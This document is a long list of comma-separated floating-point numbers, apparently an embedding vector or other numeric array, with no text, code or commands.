0.048690736293792725, 0.029428767040371895, -0.011025483720004559, -0.011149134486913681, -0.05061418190598488, 0.008380741812288761, 0.02514222450554371, 0.04981732740998268, -0.0389910563826561, 0.019289445132017136, -0.002948715817183256, 0.007769359741359949, -0.02635124884545803, 0.023617204278707504, 0.01825902611017227, 0.005681043490767479, -0.024455279111862183, 0.016953827813267708, -0.011176612228155136, 0.003031149273738265, -0.002517657121643424, 0.003025997197255492, 0.008325786329805851, -0.014494561590254307, 0.004520104732364416, 0.004389584995806217, 0.049350202083587646, -0.017022522166371346, -0.010791921988129616, 0.010414102114737034, -0.0061790794134140015, 0.027780096977949142, 0.01265354547649622, 0.00017871330783236772, -0.015236462466418743, -0.0012210465501993895, 0.0029727588407695293, -0.004520104732364416, -0.0018015159294009209, -0.02247687429189682, 0.006893503479659557, -0.005306657869368792, 0.014576994813978672, -0.0214189775288105, -0.0004834382561966777, -0.011588779278099537, -0.020965592935681343, 0.02967606857419014, -0.0005164975300431252, 0.0031238871160894632, -0.03915592283010483, -0.010599576868116856, 0.07600370794534683, 0.00943863857537508, -0.0015396177768707275, 0.005210485775023699, 0.0015670956345275044, 0.020361080765724182, -0.016967566683888435, -0.02147393301129341, -0.005433742888271809, 0.0016229100292548537, 0.022105922922492027, 0.010180540382862091, -0.018849799409508705, 0.04091450572013855, 0.0038709407672286034, -0.0005083400756120682, 0.006522552575916052, -0.018478848040103912, 0.01849258691072464, -0.017173651605844498, -0.013958743773400784, 0.000898181926459074, 0.0026893937028944492, -0.01759955659508705, 0.03816672042012215, -0.00269111106172204, -0.008257091045379639, 0.016294360160827637, -0.020278647541999817, -0.006426380015909672, -0.011396434158086777, 0.00019685296865645796, -0.006395467557013035, -0.00919133797287941, 0.010098106227815151, -0.018739888444542885, -0.0032475374173372984, -0.0060897767543792725, -0.027381667867302895, -0.010166801512241364, 0.006086342036724091, -0.02386450581252575, 0.014178565703332424, -0.02962111309170723, -0.029099034145474434, -0.017695730552077293, 0.022009750828146935, 0.009184468537569046, -0.0024764405097812414, 0.000230985606322065, -0.00355151086114347, -0.009788980707526207, 0.005876823328435421, 0.0014348585391417146, -0.009486724622547626, 0.005557393189519644, 0.024675101041793823, -0.00005125261304783635, -0.00877230055630207, 0.00006992895941948518, 0.023891983553767204, -0.005210485775023699, 0.0057325647212564945, -0.018231548368930817, 0.01309319119900465, 0.0028645650018006563, -0.01621192693710327, 0.017407212406396866, -0.004259065259248018, 0.019632916897535324, 0.026612289249897003, 0.026378726586699486, 0.008435697294771671, -0.009273771196603775, 0.016253143548965454, -0.014178565703332424, 0.03283601999282837, 0.033193230628967285, -0.02341112121939659, 0.00040379544952884316, 0.018836060538887978, 0.013464142568409443, -0.01893223263323307, 0.0047639706172049046, -0.0193718783557415, 0.0111834816634655, -0.01270163245499134, -0.040832072496414185, -0.0001991070166695863, -0.021391499787569046, 0.028521999716758728, 0.007034327369183302, 0.032808542251586914, -0.008552477695047855, -0.012536765076220036, -0.007680056616663933, 0.029099034145474434, -0.006168775260448456, -0.01220703125, -0.009143251925706863, -0.011966600082814693, 0.011224698275327682, 0.010290451347827911, 0.012722240760922432, -0.017365995794534683, -0.00807848572731018, 0.019509267061948776, 0.001347272889688611, 0.0034776641987264156, 0.013457273133099079, -0.0115200849249959, 0.025952821597456932, 0.006323338020592928, -0.029813457280397415, -0.021941056475043297, -0.005997038912028074, 0.02309512533247471, 0.004822361283004284, 0.005203616339713335, -0.021501410752534866, -0.0029366943053901196, -0.033852700144052505, 0.04256317764520645, -0.020251169800758362, 0.005595175549387932, -0.00036343737156130373, 0.00534444022923708, -0.015689847990870476, -0.003001954173669219, 0.029044078662991524, 0.015648631379008293, 0.009521071799099445, -0.0027134367264807224, -0.008250221610069275, 0.020402297377586365, -0.021336544305086136, 0.004482322838157415, -0.00827769935131073, 0.010221756994724274, 0.020498469471931458, -0.025568131357431412, 0.005667304620146751, -0.002790718339383602, -0.022737912833690643, 0.015305157750844955, 0.01494794525206089, -0.0022222704719752073, -0.01065453328192234, 0.003386643948033452, 0.02086942084133625, -0.020470991730690002, -0.0600116066634655, 0.008923429064452648, -0.005014705937355757, -0.0072747585363686085, 0.012227639555931091, 0.018808582797646523, -0.004681537393480539, 0.0037885073106735945, -0.004066720604896545, 0.004681537393480539, 0.004856708459556103, -0.00004642252315534279, 0.0027872836217284203, -0.011245306581258774, -0.0016598333604633808, 0.029428767040371895, -0.029538679867982864, -0.019000926986336708, -0.022847825661301613, 0.01448082271963358, -0.012859629467129707, -0.02430414967238903, -0.040062692016363144, 0.014906728640198708, -0.024647623300552368, -0.018451370298862457, 0.05775842070579529, 0.024647623300552368, -0.02768392488360405, 0.012028425000607967, 0.009885153733193874, 0.0016572573222219944, 0.010503404773771763, 0.022023489698767662, -0.03184681758284569, 0.00555052375420928, -0.01876736618578434, -0.0033505791798233986, 0.0022239878308027983, 0.020168734714388847, 0.02214713953435421, -0.01074383594095707, -0.03206663951277733, 0.012227639555931091, -0.02457892894744873, 0.0029607373289763927, 0.009404291398823261, 0.011334609240293503, -0.000526372401509434, 0.016033319756388664, 0.02341112121939659, 0.008401350118219852, 0.018794843927025795, 0.01683017797768116, -0.02989589050412178, -0.029373811557888985, -0.0046746679581701756, 0.016225665807724, 0.004344933666288853, 0.017242345958948135, 0.009349335916340351, -0.015415068715810776, 0.03393513336777687, -0.01060644630342722, -0.005389091558754444, -0.012000947259366512, -0.04767405614256859, 0.0040632858872413635, -0.005835606716573238, -0.008353264071047306, 0.0035343372728675604, 0.004334629513323307, 0.005715391132980585, 0.0010802226606756449, 0.02115793712437153, 0.03569371625781059, -0.0214189775288105, 0.009280640631914139, -0.00010883800860028714, -0.02724427916109562, 0.004403323866426945, -0.007748751435428858, 0.002155293244868517, -0.003640813985839486, -0.012605459429323673, -0.011417043395340443, 0.016321837902069092, 0.028192264959216118, -0.024894924834370613, -0.010043150745332241, -0.012461201287806034, -0.00401519937440753, 0.006828243378549814, 0.006103515625, -0.00021198725153226405, -0.005464655812829733, 0.02690080739557743, -0.000999506446532905, 0.012584851123392582, 0.006680550053715706, 0.016308099031448364, -0.016679050400853157, -0.014302216470241547, -0.0159508865326643, 0.026529856026172638, 0.014549517072737217, -0.027312973514199257, 0.04292038828134537, -0.031214827671647072, -0.006124123930931091, -0.02596656046807766, -0.013175624422729015, -0.0001715218386380002, -0.0005027586012147367, 0.01284589059650898, -0.002485027303919196, 0.016857655718922615, -0.003513728966936469, -0.02198227308690548, 0.012419983744621277, 0.005426873452961445, 0.009129513055086136, 0.002792435698211193, -0.01860249787569046, 0.011698691174387932, 0.02059464156627655, -0.007247280795127153, -0.017750686034560204, 0.0013945004902780056, -0.020182473585009575, 0.012365028262138367, -0.00487044733017683, -0.018616236746311188, -0.012138335965573788, -0.013072582893073559, 0.012770326808094978, -0.006780157331377268, 0.039952781051397324, -0.015222723595798016, -0.014151087962090969, 0.015538719482719898, 0.01483803428709507, -0.01265354547649622, 0.0030912570655345917, 0.01314814668148756, -0.02801365964114666, -0.012942063622176647, -0.0010424406500533223, -0.03267115354537964, -0.010998005978763103, 0.01406178530305624, 0.033083319664001465, 0.012605459429323673, 0.0018650584388524294, 0.020896898582577705, -0.01040723267942667, -0.026667244732379913, -0.0020728595554828644, -0.03616083785891533, -0.010723227635025978, 0.006234035361558199, -0.03327566385269165, -0.04314021021127701, 0.0005864801933057606, -0.030802659690380096, 0.003046605736017227, 0.02104802615940571, 0.04987228289246559, -0.02397441677749157, -0.004997532349079847, -0.005488698836416006, -0.03388017788529396, 0.004825796000659466, 0.01519524585455656, -0.0009531376417726278, -0.012591720558702946, 0.0012098837178200483, -0.025348307564854622, 0.016843916848301888, 0.037946898490190506, 0.01110104750841856, 0.013299275189638138, -0.0049940976314246655, -0.0031135829631239176, -0.004231587518006563, 0.007810576353222132, 0.009115774184465408, -0.005148660391569138, 0.01838267594575882, 0.0016392249381169677, 0.041821274906396866, 0.0025296788662672043, 0.023012692108750343, 0.016692789271473885, -0.003919027280062437, 0.03000580333173275, 0.010455318726599216, -0.009692808613181114, 0.010647663846611977, -0.006800765637308359, 0.010530882515013218, -0.020622119307518005, 0.003565249964594841, 0.0009539963211864233, 0.020896898582577705, -0.010098106227815151, 0.0220921840518713, 0.002613829681649804, -0.025444481521844864, -0.01777816377580166, 0.0230401698499918, -0.02203722856938839, -0.002572612836956978, 0.007384669966995716, 0.010434710420668125, 0.018478848040103912, -0.011664343997836113, 0.016582876443862915, 0.00930124893784523, 0.023603465408086777, 0.012440592981874943, -0.00657407334074378, 0.003433012869209051, 0.022710435092449188, 0.0008178951102308929, 0.01154069323092699, 0.007006849627941847, -0.010503404773771763, 0.046932153403759, 0.03322070837020874, 0.005100574344396591, 0.0018942536553367972, -0.00539939571171999, -0.026777155697345734, -0.020031346008181572, -0.0005237963632680476, 0.01367709506303072, -0.003512011608108878, 0.007714403793215752, 0.026268815621733665, -0.00005726339077227749, -0.004822361283004284, -0.006051994394510984, -0.006192818284034729, -0.011458260007202625, -0.013958743773400784, 0.016239404678344727, -0.002021338790655136, -0.003261276287958026, 0.004908229224383831, -0.0032801672350615263, 0.006498509552329779, 0.014522039331495762, 0.018918493762612343, 0.02729923464357853, -0.011087308637797832, -0.008367002941668034, 0.030417969450354576, 0.009177599102258682, 0.020677074790000916, -0.0032252115197479725, -0.0017147890757769346, -0.022009750828146935, -0.010345406830310822, -0.002021338790655136, -0.011980338953435421, 0.002613829681649804, -0.012516156770288944, 0.011142265051603317, 0.006828243378549814, -0.026200121268630028, -0.01672026701271534, -0.017091216519474983, 0.027312973514199257, -0.005643261596560478, 0.0065053789876401424, -0.018341459333896637, -0.010805660858750343, 0.009734025225043297, -0.02375459298491478, 0.006580942776054144, -0.002613829681649804, -0.023891983553767204, -0.025155963376164436, 0.022737912833690643, -0.005213920492678881, -0.011684952303767204, -0.006357685662806034, -0.002574330195784569, 0.01173303835093975, -0.03039049170911312, 0.0034450343810021877, -0.011149134486913681, -0.015401329845190048, -0.0220921840518713, -0.014096132479608059, 0.003338557668030262, -0.027271756902337074, -0.0024781578686088324, 0.022559307515621185, -0.033028364181518555, -0.0062168617732822895, 0.027876269072294235, -0.002445527818053961, 0.0023184427991509438, 0.023053908720612526, -0.012399375438690186, -0.0005564262974075973, -0.00591117050498724, 0.0005611490341834724, -0.00667024590075016, -0.016527920961380005, 0.0010347124189138412, 0.011107916943728924, 0.009857675060629845, -0.01755833998322487, 0.0006465879268944263, -0.008085355162620544, 0.0041938056237995625, 0.0007079837378114462, 0.030308058485388756, 0.005169268697500229, -0.003809115616604686, -0.0034759468398988247, 0.006522552575916052, 0.020402297377586365, -0.019784046337008476, 0.011643734760582447, 0.008099094033241272, 0.03610588237643242, 0.0037095085717737675, -0.021446455270051956, 0.012632937170565128, -0.022985214367508888, 0.02103428728878498, 0.019948912784457207, -0.003080952912569046, 0.0008183244499377906, 0.01081939972937107, 0.011039222590625286, 0.008209004998207092, -0.010132454335689545, 0.0020625554025173187, 0.009466116316616535, 0.010098106227815151, -0.010661402717232704, 0.012282595038414001, 0.022875303402543068, -0.005560827907174826, -0.005488698836416006, -0.0036820308305323124, 0.012921454384922981, 0.0005353885353542864, 0.0029401290230453014, 0.005598610267043114, -0.005000967066735029, 0.010304190218448639, -0.006539726164191961, -0.009033340029418468, 0.0007723849266767502, -0.015813497826457024, -0.007824315689504147, 0.009514202363789082, 0.009005862288177013, 0.02110298164188862, 0.0018169722752645612, -0.004066720604896545, -0.0037644642870873213, 0.0067595490254461765, 0.008229613304138184, 0.004186936188489199, 0.005828737281262875, -0.03511667996644974, -0.00816778838634491, -0.005083400756120682, -0.009988195262849331, -0.0044479756616055965, -0.010894964449107647, 0.01942683383822441, 0.008456305600702763, 0.009115774184465408, 0.002574330195784569, -0.011719299480319023, 0.001142906490713358, -0.010881224647164345, -0.0036854655481874943, -0.010544621385633945, -0.014329694211483002, 0.007645709440112114, -0.0015610848786309361, -0.022009750828146935, 0.006841982249170542, -0.018863538280129433, 0.009033340029418468, -0.01694008894264698, -0.00045467240852303803, 0.00394307030364871, -0.020690813660621643, 0.01993517391383648, 0.005938648246228695, -0.017187390476465225, 0.0005014705820940435, -0.013580922968685627, 0.003815985284745693, 0.008209004998207092, -0.0007865531952120364, 0.0008990406058728695, -0.0010793639812618494, -0.007178585976362228, 0.010675141587853432, -0.0173247791826725, 0.032204028218984604, -0.014618211425840855, 0.0034570558927953243, 0.01600584201514721, 0.010304190218448639, 0.0009857675759121776, 0.006258078385144472, -0.012268856167793274, 0.016816439107060432, -0.009946978650987148, 0.00009069834050023928, -0.004581930115818977, 0.016225665807724, -0.01677522249519825, 0.010153062641620636, -0.03066527098417282, 0.0006088059162721038, 0.005787520203739405, -0.012186422944068909, 0.015208984725177288, -0.044486623257398605, -0.008971515111625195, -0.001978404587134719, -0.016926350072026253, -0.01328553631901741, 0.022339485585689545, -0.014260999858379364, -0.0004252625221852213, -0.00253998301923275, -0.0007577873184345663, -0.0005169268697500229, -0.005196746904402971, -0.01743469014763832, -0.011314000934362411, -0.005004401784390211, -0.016253143548965454, -0.018863538280129433, 0.003417556406930089, 0.00045080832205712795, 0.01825902611017227, -0.013388577848672867, -0.0064744665287435055, -0.008586825802922249, 0.015676109120249748, 0.028714343905448914, -0.012440592981874943, -0.03550137206912041, -0.00015563621127512306, 0.014247260987758636, -0.013106930069625378, -0.008579956367611885, 0.012626067735254765, 0.02297147549688816, -0.002950433176010847, 0.016074536368250847, -0.021075503900647163, -0.018973449245095253, -0.0059523871168494225, 0.009569157846271992, -0.0023287469521164894, -0.010675141587853432, 0.005110878497362137, -0.006635898724198341, 0.012591720558702946, 0.024936141446232796, -0.02507353015244007, 0.025101007893681526, -0.012859629467129707, 0.00239572417922318, 0.004214413929730654, -0.009576027281582355, -0.002103772247210145, 0.007364061661064625, 0.03910096734762192, 0.006055429112166166, -0.006941589526832104, 0.006172209978103638, -0.006587812211364508, -0.011691821739077568, -0.009713416919112206, -0.03179186210036278, -0.0074327560141682625, -0.009665330871939659, -0.0008861603564582765, 0.01514029037207365, -0.00724041135981679, 0.01566237024962902, 0.013155016116797924, -0.009679069742560387, 0.01165060419589281, -0.011018614284694195, 0.022078445181250572, -0.012117727659642696, -0.02470257878303528, 0.022930258885025978, -0.005818432662636042, 0.01628062129020691, -0.01068888045847416, -0.01400682982057333, 0.028934165835380554, 0.012042163871228695, 0.005440612323582172, -0.004846404306590557, 0.00676641846075654, -0.01503037940710783, 0.01882232166826725, 0.004798317793756723, 0.008882212452590466, 0.004173197317868471, 0.030198147520422935, 0.0016795829869806767, 0.009074556641280651, -0.004743362311273813, 0.018300242722034454, -0.009885153733193874, -0.019083360210061073, -0.02496361918747425, -0.020388558506965637, 0.000349269132129848, -0.0028971948195248842, -0.01688513346016407, 0.014563255943357944, -0.0028439564630389214, -0.013958743773400784, -0.005560827907174826, 0.0019131447188556194, 0.0035824235528707504, 0.008923429064452648, 0.0214189775288105, -0.011458260007202625, 0.016747744753956795, -0.011609387584030628, 0.0028319349512457848, -0.030555360019207, -0.0018169722752645612, 0.009390552528202534, -0.002483309945091605, -0.012426854111254215, 0.006426380015909672, -0.0019371878588572145, -0.0010853747371584177, -0.003283601952716708, -0.022449396550655365, 0.02258678525686264, 0.03539146110415459, 0.004368976689875126, 0.015456285327672958, -0.028989123180508614, 0.011842949315905571, -0.0038846798706799746, -0.00138763093855232, -0.003688900265842676, 0.008064745925366879, 0.0063061644323170185, 0.0010089520364999771, -0.002435223665088415, -0.010400363244116306, 0.011808602139353752, 0.01334049180150032, -0.0026808069087564945, 0.03247880935668945, 0.012997019104659557, 0.001518150675110519, -0.00803039874881506, -0.007844923995435238, -0.01794303022325039, -0.00877230055630207, -0.012708501890301704, 0.01406178530305624, 0.0037404210306704044, 0.034649558365345, -0.0045784953981637955, -0.000022459915271610953, 0.0070755439810454845, 0.007776229176670313, -0.00813344120979309, 0.00379881146363914, 0.0033574486151337624, 0.012976410798728466, 0.004733058158308268, 0.0026825242675840855, -0.002574330195784569, -0.001437434577383101, -0.014618211425840855, -0.015291418880224228, 0.007611361797899008, -0.006872895173728466, 0.029703546315431595, -0.01046218816190958, 0.004643755033612251, -0.00009949984087143093, 0.00295558525249362, 0.018918493762612343, -0.00910203531384468, -0.0003675161278806627, 0.01176738552749157, -0.008463175036013126, -0.007666317746043205, 0.008154049515724182, 0.013313014060258865, 0.01975656859576702, 0.011039222590625286, 0.01220703125, 0.020745771005749702, 0.005076531320810318, 0.01832772046327591, -0.01715991273522377, 0.007123630493879318, -0.0013026214437559247, 0.017256084829568863, 0.008449436165392399, 0.029868412762880325, -0.0035034248139709234, -0.00025696074590086937, 0.0376446433365345, -0.014618211425840855, 0.0044479756616055965, 0.010489665903151035, -0.002612112322822213, -0.0071442387998104095, -0.006522552575916052, 0.002414615359157324, 0.010393493808805943, 0.006082907319068909, -0.006900372914969921, -0.00010797932918649167, 0.012907715514302254, -0.018011724576354027, 0.0005624370533041656, -0.016472965478897095, -0.0030912570655345917, -0.0008513837237842381, -0.008044137619435787, -0.006416075862944126, -0.008037268184125423, 0.022504352033138275, -0.002287530340254307, -0.012035294435918331, -0.009514202363789082, -0.015703586861491203, 0.01765451207756996, 0.006999980192631483, 0.007577014621347189, 0.02503231354057789, -0.0004529550496954471, 0.01683017797768116, 0.008648650720715523, -0.024372845888137817, 0.0038331588730216026, 0.028989123180508614, -0.014989162795245647, 0.010036281310021877, -0.016788961365818977, -0.01639053225517273, -0.004238456953316927, -0.010585837997496128, -0.00013631585170514882, -0.009143251925706863, -0.012722240760922432, -0.014604472555220127, 0.028384609147906303, -0.004482322838157415, -0.00885473471134901, -0.01464568916708231, 0.0058905621990561485, 0.003264711005613208, -0.009198207408189774, -0.004671232774853706, 0.003544641425833106, -0.0036270751152187586, -0.011781124398112297, -0.0027598056476563215, -0.02203722856938839, 0.00282334815710783, 0.033138275146484375, -0.028274698182940483, -0.0005280897603370249, 0.026172643527388573, -0.012804673984646797, 0.0027151540853083134, -0.000962583115324378, 0.008318915963172913, 0.025114746764302254, -0.008669259026646614, 0.0052860495634377, -0.014302216470241547, 0.008566216565668583, 0.003129039192572236, -0.0009436921100132167, 0.015607413835823536, 0.00027241703355684876, -0.00783118512481451, 0.040832072496414185, 0.009892023168504238, 0.002948715817183256, 0.012577981688082218, 0.006058863829821348, -0.005729130003601313, 0.03720499575138092, -0.014109871350228786, -0.023768331855535507, -0.028439566493034363, 0.005169268697500229, 0.012612328864634037, 0.01165747456252575, 0.012591720558702946, -0.013835093006491661, -0.0053787874057888985, -0.004180066753178835, 0.013416055589914322, 0.024647623300552368, 0.008380741812288761, -0.008916559629142284, 0.004592234268784523, -0.012323811650276184, 0.004812057130038738, -0.019687872380018234, -0.00028164786635898054, 0.015401329845190048, -0.002514222403988242, 0.0049940976314246655, -0.0032217768020927906, 0.010702619329094887, 0.0026790895499289036, -0.011176612228155136, 0.0002511646307539195, -0.0005143508315086365, -0.020663335919380188, -0.022682957351207733, -0.0016778656281530857, -0.013354230672121048, 0.02841208688914776, 0.010558360256254673, 0.015511241741478443, 0.010201148688793182, -0.00032071792520582676, -0.001500118407420814, 0.00617564469575882, -0.002364811720326543, -0.020443513989448547, 0.01661035418510437, 0.004956315737217665, 0.025568131357431412, 0.007927357219159603, -0.010633924975991249, -0.027835052460432053, -0.0011497759260237217, -0.0019200141541659832, 0.006814504507929087, -0.016486704349517822, -0.007762490306049585, 0.030692748725414276, 0.015291418880224228, 0.005392526276409626, -0.026048993691802025, -0.006192818284034729, 0.005653565749526024, 0.01926196739077568, -0.0004967478453181684, 0.02357598766684532, -0.005110878497362137, 0.012042163871228695, -0.002385420026257634, -0.011176612228155136, 0.01268102414906025, -0.004131980240345001, -0.010056889615952969, 0.002661915961652994, -0.009211946278810501, 0.003390078665688634, 0.026007777079939842, 0.0008196124690584838, -0.02247687429189682, 0.008847865276038647, -0.012186422944068909, -0.01552498061209917, -0.015607413835823536, -0.01533263549208641, -0.008250221610069275, -0.005907735787332058, -0.002309856005012989, -0.015428807586431503, -0.01448082271963358, -0.002946998458355665, 0.005660435184836388, 0.0013060561614111066, 0.026777155697345734, 0.010469057597219944, -0.011945991776883602, 0.006752679590135813, -0.01195973064750433, -0.006529422011226416, -0.030088236555457115, 0.01617071032524109, 0.027271756902337074, -0.010256104171276093, 0.03552884981036186, -0.012055902741849422, 0.011471998877823353, 0.0032526894938200712, 0.010379754938185215, 0.010187409818172455, -0.0004971771850250661, 0.005516176577657461, -0.021130459383130074, -0.011224698275327682, -0.015923408791422844, 0.022737912833690643, -0.007783098611980677, 0.00244381045922637, -0.0072335414588451385, -0.020883159711956978, 0.013113799504935741, -0.0067320712842047215, 0.011684952303767204, 0.007020588498562574, -0.005526480730623007, -0.016747744753956795, -0.015978364273905754, 0.0024609840475022793, -0.010290451347827911, 0.010146193206310272, -0.012131466530263424, -0.030692748725414276, -0.01582723669707775, 0.008792908862233162, -0.00890969019383192, 0.005097139626741409, -0.016033319756388664, -0.010578968562185764, 0.022504352033138275, 0.001901123090647161, 0.027038196101784706, -0.008140310645103455, 0.013189363293349743, -0.0049219680950045586, 0.005292918998748064, 0.005172703415155411, -0.00719919428229332, 0.0034931206610053778, 0.0008183244499377906, 0.012928323820233345, -0.0020659901201725006, 0.009404291398823261, -0.0045372783206403255, 0.015854714438319206, -0.00875169225037098, -0.00002637765464896802, 0.0006264089024625719, -0.010132454335689545, -0.0004980358644388616, -0.0007161412504501641, 0.02635124884545803, -0.009411160834133625, -0.008442566730082035, 0.006927850656211376, -0.013051974587142467, 0.00008221885218517855, 0.01503037940710783, -0.01085374690592289, -0.007336583454161882, -0.0014863794203847647, -0.002564026042819023, -0.008813517168164253, -0.022078445181250572, -0.020690813660621643, 0.009005862288177013, 0.007425886578857899, -0.014906728640198708, -0.0020402297377586365, 0.010757574811577797, -0.012241378426551819, 0.02773888036608696, -0.033962611109018326, -0.013010757975280285, -0.0009943543700501323, 0.007068674545735121, 0.020938115194439888, 0.00435867253690958, -0.02053968608379364, -0.01519524585455656, -0.007851793430745602, -0.01154069323092699, -0.0058905621990561485, -0.003165103727951646, 0.0085249999538064, 0.0011265914654359221, 0.018080418929457664, 0.0008895951323211193, 0.0020453818142414093, -0.006876329891383648, -0.025334568694233894, -0.023878244683146477, 0.013601531274616718, 0.02529335208237171, -0.01948178932070732, -0.0021192284766584635, -0.0010244082659482956, -0.012323811650276184, -0.013313014060258865, 0.010537751950323582, 0.014082393608987331, -0.008002921007573605, 0.0031359086278826, 0.0005787520203739405, -0.006446988321840763, 0.003980852197855711, 0.015208984725177288, 0.012873368337750435, -0.012220770120620728, 0.008875343017280102, -0.0027666750829666853, -0.006051994394510984, -0.009926370345056057, -0.006065733265131712, -0.010194279253482819, 0.021666277199983597, -0.007625101134181023, -0.015401329845190048, -0.0006418651901185513, 0.01434343308210373, 0.005358179099857807, 0.014673166908323765, 0.00015928561333566904, 0.022985214367508888, 0.011506346054375172, 0.0025983734522014856, 0.020388558506965637, -0.01068888045847416, 0.02525213547050953, 0.01021488755941391, -0.024098066613078117, -0.00009622611105442047, -0.010668272152543068, 0.006883199326694012, 0.02059464156627655, -0.007130499929189682, -0.022889042273163795, 0.015428807586431503, 0.014288477599620819, 0.00885473471134901, 0.002534830942749977, 0.008456305600702763, 0.002722023753449321, -0.008875343017280102, 0.009266901761293411, 0.005766911897808313, -0.002867999719455838, 0.004952881019562483, -0.0001637936948100105, 0.01787433587014675, -0.004530408885329962, -0.005083400756120682, -0.008744822815060616, 0.010840008035302162, -0.01279093511402607, -0.004248761106282473, -0.0012004381278529763, -0.005887127481400967, -0.029153989627957344, 0.0024953314568847418, -0.0029384116642177105, 0.006313033867627382, 0.019619178026914597, 0.006340512074530125, 0.0027529362123459578, -0.0019904260989278555, -0.0026790895499289036, -0.020567163825035095, 0.00308782234787941, -0.0021415541414171457, 0.020732030272483826, 0.014096132479608059, 0.023438598960638046, -0.0032234941609203815, -0.0037919420283287764, -0.0022428787779062986, -0.008758561685681343, -0.018341459333896637, -0.022009750828146935, 0.022820347920060158, -0.018176591023802757, 0.02020995132625103, 0.0046677980571985245, -0.012715371325612068, 0.002019621431827545, 0.009294379502534866, -0.012639806605875492, -0.009905762039124966, 0.024331629276275635, -0.00816778838634491, -0.01406178530305624, 0.015689847990870476, 0.01400682982057333, 0.005358179099857807, 0.0014348585391417146, 0.013491620309650898, -0.0021638800390064716, -0.000424189172917977, -0.002570895478129387, -0.011760516092181206, 0.01434343308210373, -0.006113819777965546, 0.023053908720612526, -0.008298307657241821, 0.016802700236439705, 0.000816177751403302, -0.000013886507076676935, -0.016198188066482544, -0.01898718811571598, -0.015964625403285027, 0.0048944903537631035, 0.022518090903759003, 0.01986647956073284, 0.006982806604355574, -0.016088275238871574, -0.020017607137560844, -0.011032353155314922, -0.007927357219159603, 0.002917803358286619, 0.003946505021303892, -0.007192324846982956, -0.007762490306049585, -0.018478848040103912, -0.006608420982956886, -0.019632916897535324, 0.00794109608978033, 0.012742849066853523, -0.022366963326931, -0.0033729050774127245, 0.001179829821921885, 0.016198188066482544, 0.008634911850094795, -0.00827769935131073, 0.01655539870262146, -0.0004907370894216001, 0.009074556641280651, -0.006625594571232796, 0.0002689823159016669, -0.002315008081495762, 0.01439838856458664, -0.000018005499441642314, -0.02552691474556923, 0.0053169624879956245, -0.013155016116797924, -0.008428827859461308, 0.004482322838157415, 0.013271797448396683, -0.004365541972219944, 0.011039222590625286, -0.002366529079154134, 0.008895951323211193, 0.020896898582577705, 0.0010853747371584177, 0.016143232583999634, -0.003819420002400875, 0.008092224597930908, -0.01750338450074196, -0.010091236792504787, 0.01143078226596117, -0.004382715560495853, -0.020951854065060616, -0.005602044984698296, 0.022298268973827362, -0.012413114309310913, -0.0009703112882561982, 0.032863497734069824, 0.01464568916708231, -0.02225705049932003, -0.004104502499103546, 0.0051795728504657745, 0.01265354547649622, 0.009486724622547626, 0.009527941234409809, -0.0013550010044127703, 0.010475927032530308, 0.005945517681539059, 0.001949209370650351, 0.010530882515013218, 0.014961684122681618, 0.00038125505670905113, -0.011417043395340443, -0.004444540943950415, 0.009177599102258682, -0.021350283175706863, -0.015071596018970013, -0.005457786377519369, 0.048635777086019516, 0.0018959710141643882, -0.009211946278810501, -0.026378726586699486, -0.022559307515621185, -0.024537712335586548, 0.02729923464357853, 0.009308118373155594, -0.007721273228526115, 0.006096646189689636, 0.010475927032530308, 0.006845416966825724, 0.003991156350821257, -0.004671232774853706, -0.018629975616931915, -0.011032353155314922, -0.003932766150683165, 0.025210918858647346, -0.00783118512481451, 0.010750705376267433, 0.005416569299995899, 0.004980358760803938, 0.020622119307518005, 0.0016941806534305215, 0.005825302097946405, 0.01143078226596117, 0.004654059186577797, 0.013594661839306355, -0.00958289671689272, -0.017256084829568863, 0.002953867893666029, 0.009809589013457298, 0.007954834960401058, 0.020141256973147392, -0.022847825661301613, -0.013079452328383923, -0.006220296490937471, -0.017365995794534683, -0.006168775260448456, -0.002620699116960168, 0.021941056475043297, 0.022889042273163795, 0.023273730650544167, 0.008312046527862549, -0.007089282851666212, 0.008318915963172913, -0.013855701312422752, -0.02187236212193966, -0.008016659878194332, 0.02165253832936287, -0.002797587774693966, 0.01986647956073284, 0.00009681645315140486, 0.009335596114397049, -0.012715371325612068, 0.01478307880461216, 0.0027168714441359043, 0.00968593917787075, -0.02341112121939659, 0.007961704395711422, -0.003393513383343816, -0.024400323629379272, 0.020443513989448547, -0.005529915448278189, -0.027422886341810226, -0.01514029037207365, -0.017283562570810318, -0.0009874849347397685, -0.003826289437711239, -0.0013687399914488196, -0.022737912833690643, 0.020855681970715523, 0.006539726164191961, -0.005341005511581898, -0.01977030746638775, 0.0005950669874437153, -0.001543911173939705, -0.040941983461380005, -0.017063738778233528, -0.014123610220849514, 0.010091236792504787, 0.005976430606096983, 0.02119915373623371, -0.01021488755941391, -0.010915572755038738, -0.003175408113747835, -0.016459226608276367, -0.00027370505267754197, 0.014604472555220127, -0.004891055636107922, 0.009033340029418468, -0.020498469471931458, 0.00045252570998854935, -0.019976390525698662, 0.00642294529825449, -0.012715371325612068, 0.007803706917911768, 0.008847865276038647, 0.028247220441699028, 0.002665350679308176, -0.004808622412383556, -0.02501857466995716, 0.0033299708738923073, 0.004715884570032358, -0.004475453402847052, -0.016088275238871574, 0.0011257327860221267, 0.02115793712437153, 0.01173303835093975, 0.004430802073329687, -0.004935707431286573, -0.005725695285946131, 0.007364061661064625, -0.004118241369724274, -0.0028319349512457848, 0.02165253832936287, -0.0037644642870873213, -0.003857201896607876, 0.04690467566251755, 0.003441599663347006, -0.006625594571232796, 0.0072953668422997, -0.00539939571171999, 0.0068488516844809055, -0.01798424683511257, -0.007309105712920427, 0.00949359405785799, 0.0033488618209958076, -0.006893503479659557, 0.01986647956073284, -0.0033299708738923073, 0.003208037931472063, 0.011794863268733025, 0.0009763220441527665, 0.01986647956073284, 0.01279093511402607, 0.005904301069676876, -0.034622080624103546, 0.02547195926308632, 0.008744822815060616, 0.02762896940112114, 0.006835112813860178, -0.023507293313741684, 0.008442566730082035, 0.014920467510819435, 0.007858662866055965, -0.002620699116960168, -0.01942683383822441, 0.01699504442512989, -0.007315975148230791, 0.03429234400391579, -0.0061172544956207275, -0.014151087962090969, -0.007515189703553915, 0.005457786377519369, -0.010386624373495579, -0.001268274150788784, -0.011980338953435421, -0.017256084829568863, 0.02015499584376812, -0.0022549002896994352, -0.006313033867627382, -0.00816778838634491, 0.01099113654345274, -0.0071442387998104095, -0.011836079880595207, 0.009734025225043297, -0.003420991124585271, 0.023397382348775864, -0.01772320829331875, -0.0010020824847742915, 0.004970054607838392, -0.004241891670972109, 0.028467044234275818, 0.013491620309650898, 